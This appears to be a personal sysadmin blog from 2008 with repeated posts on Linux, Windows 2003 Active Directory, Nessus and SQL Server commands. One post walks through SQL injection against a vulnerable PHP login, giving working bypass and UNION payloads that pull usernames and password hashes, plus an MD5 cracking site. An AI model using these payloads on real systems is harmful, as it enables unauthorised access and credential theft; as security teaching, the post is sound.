A little tip for linux:
To find large files on a system we can do:
$ find / -type f -size +20000k -exec ls -lh {} \;
We can use other filesystem like /home or /tmp
Thursday, December 18, 2008
Monday, September 22, 2008
win2003 AD cheat sheet =D
Some diags i like to run on Win2003 AD:
==== Diags Commands ====
Check - c:\windows\NTDS – ntds.dit / edb.xxx
c:\windows\SYSVOL\sysvol\domain.local — subfolders
share – NETLOGON -> c:\windows\SYSVOL\sysvol\domain.local\SCRIPTS
share – SYSVOL -> c:\windows\SYSVOL\sysvol
Check – DNS console – SRV records – _msdcs.domain.local
= nslookup
nslookup gc._msdcs
Check - c:\windows\NTDS – ntds.dit / edb.xxx
c:\windows\SYSVOL\sysvol\domain.local — subfolders
share – NETLOGON -> c:\windows\SYSVOL\sysvol\domain.local\SCRIPTS
share – SYSVOL -> c:\windows\SYSVOL\sysvol
Check – DNS console – SRV records – _msdcs.domain.local
= nslookup
nslookup gc._msdcs
= DCDIAG /C /V <————– TESTES ao DC —————- > NETDIAG /v /debug > netdiag.txt
= dcdiag /test: replications
dcdiag /test: topology, cutoffserver, netlogons, fsmocheck, DNS, frssysvol, frsevent, kccevent, systemlog, RegisterInDNS,
= repadmin /replsum
= repadmin /showrepl
= = REPADMIN /SYNCALL /A /e /d /q
= = REPADMIN /SYNCALL /A /e /d /q /P
== repadmin /replicate TargetDC SourceDC NamingContext /force
= repadmin /showconn
= repadmin /showreps
= dcdiag /test: replications
dcdiag /test: topology, cutoffserver, netlogons, fsmocheck, DNS, frssysvol, frsevent, kccevent, systemlog, RegisterInDNS,
= repadmin /replsum
= repadmin /showrepl
= = REPADMIN /SYNCALL
= = REPADMIN /SYNCALL
== repadmin /replicate TargetDC SourceDC NamingContext /force
= repadmin /showconn
= repadmin /showreps
= netdom query FSMO == netdom /verify DSTBDC /domain:domain.local
= netdom query DC
= netdom query DC
= nltest /DSGETDC:domain.local
= dnslint /ad /s localhost /v
= dnslint /d domain.local /s 10.30.1.217 /v
explore
= dcdiag
= netdiag
= dnslint /d domain.local /s 10.30.1.217 /v
explore
= dcdiag
= netdiag
= w32tm /config /syncfromflags:manual /manualpeerlist:10.1.1.1
= w32tm /config /update
= w32tm /dumpreg /subkey:parameters
= w32tm /monitor
= w32tm /config /update
= w32tm /dumpreg /subkey:parameters
= w32tm /monitor
—–Testar———— exchange “Service Principal Names” – LDAP ——————–
setspn -L “servername”
setspn -?
Netsh - —– http://technet.microsoft.com/en-us/library/bb491071.aspx
setspn -L “servername”
setspn -?
Netsh - —– http://technet.microsoft.com/en-us/library/bb491071.aspx
Friday, July 11, 2008
Dnslint - Utility
The dnslint (windows 2003) utility tests various dns options.
To use it we can try the following:
> dnslint /d "domain.name" /s 10.1.1.1 /c
Explanation of the flags used:
- /d set's the domain to test
- /s flag it's used to bypass the Internic whois lookup, and use 10.1.1.1 dns
- /c flag is for testing mail servers
It can be used to test a lot more, with /ad flag it will do requests to active directory.
There is a lot more flags, do a simple
> dnslint /? |more
to see the options
To use it we can try the following:
> dnslint /d "domain.name" /s 10.1.1.1 /c
Explanation of the flags used:
- /d set's the domain to test
- /s flag it's used to bypass the Internic whois lookup, and use 10.1.1.1 dns
- /c flag is for testing mail servers
It can be used to test a lot more, with /ad flag it will do requests to active directory.
There is a lot more flags, do a simple
> dnslint /? |more
to see the options
Tuesday, July 1, 2008
Nessus commands
EXAMPLE
To perform a command-line scan against 192.168.0.0/24, do the following:
echo 192.168.0.0/24 > targets.txt
nessus -xq localhost 1241 yourLogin yourPassword targets.txt report.txt
To perform a command-line scan against 192.168.0.0/24, do the following:
echo 192.168.0.0/24 > targets.txt
nessus -xq localhost 1241 yourLogin yourPassword targets.txt report.txt
Sql Server - Truncate Log Files
SQL Server:
“Clean LOG Files”
backup log BizTalkMsgBoxDb with truncate_only
DBCC SHRINKFILE (BizTalkMsgBoxDb_log, 200)
Fazer também na Base de Dados “BizTalkDTADb”
backup log BizTalkDTADb with truncate_only
DBCC SHRINKFILE (BizTalkDTADb_log, 200)
Fazer também na Base de Dados “BizTalkMgmtDb”
use BizTalkMgmtDb
backup log BizTalkMgmtDb with truncate_only
DBCC SHRINKFILE (BizTalkMgmtDb_log, 100)
...
Etc
Examples of commands that can "help":
use BizTalkMgmtDb
backup log BizTalkMgmtDb with truncate_only
DBCC SHRINKFILE (BizTalkMgmtDb_log, 100)
use RNT_EXCEPTION;
backup log RNT_EXCEPTION with truncate_only
DBCC SHRINKFILE (DotNetNuke_log, 100)
use master;
select * from sysfiles;
select * from sysdatabases;
EXEC sp_databases;
EXEC sp_helpdb;
Monday, June 30, 2008
SQL inject - test
Sample PHP code for authenticating a user during login
$sql = "SELECT * FROM accounts WHERE username='".$_GET['username']."' and password = '".md5($_GET['password'])."'";
If I enter admin for both the username and password the resulting sql statement would be as followsSELECT * FROM accounts WHERE username='admin' and password = '21232f297a57a5a743894a0e4a801fc3'
If there is a record in accounts with both username and password as admin, then I will get logged in, otherwise the login will fail.
Thats all well and good, but there is a very critical problem.
The problem here resides in the fact that there is no validation on what the user inputs, but the input is used to create a SQL statement.
Lets take a look at the following SQL statement
SELECT * FROM accounts WHERE username='admin' /* and password = '21232f297a57a5a743894a0e4a801fc3 '
What would this statement result in?
First thing to notice is the /*
This is a comment delimiter in MySQL, which means anything following it is considered a comment and is ignored.
Another way to think about it is that the SQL Statement ends at this point.
So if there statement ends at the /* then the effective SQL statement isSELECT * FROM accounts WHERE username='admin'
So when will this generate a valid result?
It will be valid if the username exists in the database, and if it does, then it will return that record.
This means it will log me in as the admin without need for discovering/guessing the password!!
Sounds good, how would I make the SQL statement look like that. Well try entering in this as your usernameadmin' /*
If you look again at the orignal SQL statement and insert this as the username you will see how it alters the SQL statement in a way that the statement is still valid in syntax but the symantic meaning has been altered to suit your needs. Here is what it will look likeSELECT * FROM accounts WHERE username='admin' /* ' and password = '21232f297a57a5a743894a0e4a801fc3'
Now isnt this cool?
Alright, now look at the source code. Theres a link to the source on the main page.
Notice that its displaying the username from the database query result.
This means we can see data from the database. So lets try using a UNION query to get arbitrary data from the database.
When using UNION queries there is a requirement that both sets of data share the exact same number of columns.
Since you dont know how many columns are being returned, we have to discover this information using this technique
How to solve over/under column problems
Start with one field using NULL as its valueadmin' UNION SELECT NULL FROM accounts LIMIT 1,1 /*
This will result in an error “The used SELECT statements have a different number of columnsâ€.
This is telling us that the two data sets do not having matching number of columns.
Add another NULLadmin' UNION SELECT NULL, NULL FROM accounts LIMIT 1,1 /*
Same error
and Add another NULLadmin' UNION SELECT NULL, NULL, NULL FROM accounts LIMIT 1,1 /*
No more error.
Now that we know how many columns we have to work with, lets concat in the data
In these we will get the account table records
admin' UNION SELECT NULL, concat(id, ' - ', username, ' - ', password) AS username, NULL FROM accounts LIMIT 1,1 /*
Notice the last field is the MD5 hash. Here is where the toolkit link to the MD5 hash database comes in handy http://www.md5decrypt.com/
Put in that md5 hash and if its a common password, you will get a result
Now lets get another user record by shifting the LIMIT to start on the next record
admin’ UNION SELECT NULL, concat(id, ‘ - ‘, username, ‘ - ‘, password) AS username, NULL FROM accounts LIMIT 2,1 /*
Now lets get data from an entirely different table
admin' UNION SELECT NULL, concat(prodid, ' - ', name, ' - ', description, ' - ', price) AS username, NULL FROM inventory LIMIT 1,1 /*
admin' UNION SELECT NULL, concat(prodid, ' - ', name, ' - ', description, ' - ', price) AS username, NULL FROM inventory LIMIT 2,1 /*
As you can see, once you have a SQL injection point you can gain access to a great deal of database information.
nice link: hxxp://www.md5decrypter.com/
hxxp://www.mightyseek.com/podcasts/hands-on-series-sql-injection
Sunday, June 29, 2008
Build Install Package - Free
Make a install package file :)
You can just use winxp and:
1- start -> run
2- iexpress
It start's the wizard, and you can create your install package :)
I've seen this on Hak.5 great site :)
You can just use winxp and:
1- start -> run
2- iexpress
It start's the wizard, and you can create your install package :)
I've seen this on Hak.5 great site :)
Use Calc to Surf the web
We can use the "calc" program to surf the web:
Open calc:
1- Menu help - > help topics
2 - Alt+space
3 - "Jump to URL"
There, just put your url, and surf !
I've seen this on hak.5 great site :)
Open calc:
1- Menu help - > help topics
2 - Alt+space
3 - "Jump to URL"
There, just put your url, and surf !
I've seen this on hak.5 great site :)
Thursday, June 26, 2008
Windows 2003 utilitys
Some commands that are very useful:
diskpart - disk partition
dnslint - dns test / report
nslookup - dns test - interactive
nltest - test - domain / trusts
netsh - net "shell" -
netsh firewall show config - show windows firewall configuration
dcdiag - test dc's
netdiag - test network / dc's
ntdsutil - ad utility
To show last replication summary - 0 errors = Good
repadmin /replsum /bysrc /bydest /sort:delta
To show AD Roles, FSMO - Flexible single master operations
netdom query FSMO
To show last replications:
repadmin /showrepl
diskpart - disk partition
dnslint - dns test / report
nslookup - dns test - interactive
nltest - test - domain / trusts
netsh - net "shell" -
netsh firewall show config - show windows firewall configuration
dcdiag - test dc's
netdiag - test network / dc's
ntdsutil - ad utility
To show last replication summary - 0 errors = Good
repadmin /replsum /bysrc /bydest /sort:delta
To show AD Roles, FSMO - Flexible single master operations
netdom query FSMO
To show last replications:
repadmin /showrepl
Wednesday, May 14, 2008
Linux Tip - Burn cd's
-- Create an .iso:
#umount /dev/cdrom
#dd if=/dev/cdrom of=filename.iso bs=1024
-- Create .iso image file form a "dir":
#mkisofs -r -J -o file.iso /location_of_folder/
-r generates Rock Ridge long names for Linux
-J generates Joliet long names for Windows
-- Mount .iso file without having to burn:
#mkdir /media/iso
#modprobe loop
#mount cdrom.iso /media/iso/ -t iso9660 -o loop
-- To "burn" an .iso to cd:
#cdrecord dev=/dev/cdrom driveropts=burnfree -v -data cd_image.iso
To burn an audio cd from wav files:
#cdrecord dev=/dev/cdrom driveropts=burnfree -v -audio [wav files...]
Replace /dev/cdrom as needed if this is not your CD-Writer
-v (verbose) lets you track the recording progress
driveropts=burnfree helps reduce the risk of a buffer under-run (most drives should support this)
#umount /dev/cdrom
#dd if=/dev/cdrom of=filename.iso bs=1024
-- Create .iso image file form a "dir":
#mkisofs -r -J -o file.iso /location_of_folder/
-r generates Rock Ridge long names for Linux
-J generates Joliet long names for Windows
-- Mount .iso file without having to burn:
#mkdir /media/iso
#modprobe loop
#mount cdrom.iso /media/iso/ -t iso9660 -o loop
-- To "burn" an .iso to cd:
#cdrecord dev=/dev/cdrom driveropts=burnfree -v -data cd_image.iso
To burn an audio cd from wav files:
#cdrecord dev=/dev/cdrom driveropts=burnfree -v -audio [wav files...]
Replace /dev/cdrom as needed if this is not your CD-Writer
-v (verbose) lets you track the recording progress
driveropts=burnfree helps reduce the risk of a buffer under-run (most drives should support this)
Set Time - Win2003
- To set the time in a Windows 2003 server you can use the w32tm command
- w32tm /?
- w32tm /config /manualpeerlist:10.1.1.1 /syncfromflags:MANUAL
- net stop w32time
- net start w32time
- w32tm /resync
And that's it, now you will have your server setting the time from the ip:10.1.1.1
- w32tm /?
- w32tm /config /manualpeerlist:10.1.1.1 /syncfromflags:MANUAL
- net stop w32time
- net start w32time
- w32tm /resync
And that's it, now you will have your server setting the time from the ip:10.1.1.1
Tuesday, January 15, 2008
Linux Tip - Get back GRUB after clone
After cloning a Linux HDD, i've booted from the new hdd and got myself a "pretty" grub error, the screen just went:
GRUB GRUB GRUB GRUB
and it filed my screen with that.
How to recover the mbr? here is the solution that i have found on the net (google it...)
1. Boot with any live CD (I've done it with Knoppix 3.x and Ubuntu)
2. Get a root shell and make a folder (mkdir ubuntu)
3. mount the root (/) partition of ubuntu (e.g. mount /dev/hdb ubuntu if you have two disks)
4. chroot the mounted partition (chroot ubuntu)
5. grub-install /dev/hda [1]
5. Exit the shell
6. Reboot
That did the trick :)
GRUB GRUB GRUB GRUB
and it filed my screen with that.
How to recover the mbr? here is the solution that i have found on the net (google it...)
1. Boot with any live CD (I've done it with Knoppix 3.x and Ubuntu)
2. Get a root shell and make a folder (mkdir ubuntu)
3. mount the root (/) partition of ubuntu (e.g. mount /dev/hdb ubuntu if you have two disks)
4. chroot the mounted partition (chroot ubuntu)
5. grub-install /dev/hda [1]
5. Exit the shell
6. Reboot
That did the trick :)
Thursday, January 3, 2008
Linux Tip - no Beeps on console
To remove the beeps on the console, we can do this:
# setterm -blen 0
Then we can put this line on /etc/rc.d/init.d/rc.local
every time your Linux box boot it will read the above line and
this will end the beeps on linux console.
# setterm -blen 0
Then we can put this line on /etc/rc.d/init.d/rc.local
every time your Linux box boot it will read the above line and
this will end the beeps on linux console.
Linux Tip - Keymap
To change console keymap in debian:
# dpkg-reconfigure console-tools
if that doesn't work, perhaps:
# apt-get install console-data console-tools debconf
and
# apt-get update
# dpkg-reconfigure console-tools
if that doesn't work, perhaps:
# apt-get install console-data console-tools debconf
and
# apt-get update
Subscribe to:
Posts (Atom)